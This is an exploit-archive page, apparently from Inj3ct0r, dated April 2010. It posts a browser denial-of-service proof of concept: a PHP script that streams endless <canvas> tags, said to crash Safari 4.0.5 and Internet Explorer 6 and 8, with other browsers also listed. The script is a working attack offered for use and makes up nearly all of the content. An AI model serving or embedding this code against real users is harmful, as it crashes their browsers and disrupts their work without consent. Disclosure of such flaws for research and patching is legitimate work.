Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Servi
Posted on 28 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================== Safari 4.0.5 and Internet Explorer 6.0 / 8.0 Denial of Service ============================================================== <?php # Canvas tag DoS Mozilla firefox 3.6.3 # Canvas tag DoS Safari 4.0.5 (TESTED) # Canvas tag DoS Google Chrome 4.1 # Canvas tag DoS Opera 10.52 # Canvas tag DoS Internet Explorer 6.0 & 8.0 (TESTED) # # Found by Jelmer de Hen # published at http://h.ackack.net/?p=269 # OS: Windows XP SP3 # Mozilla Firefox 3.6.3 echo "<html><body>"; while (1){ echo "<canvas>"; } echo "</body>"; echo "</html>"; ?> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>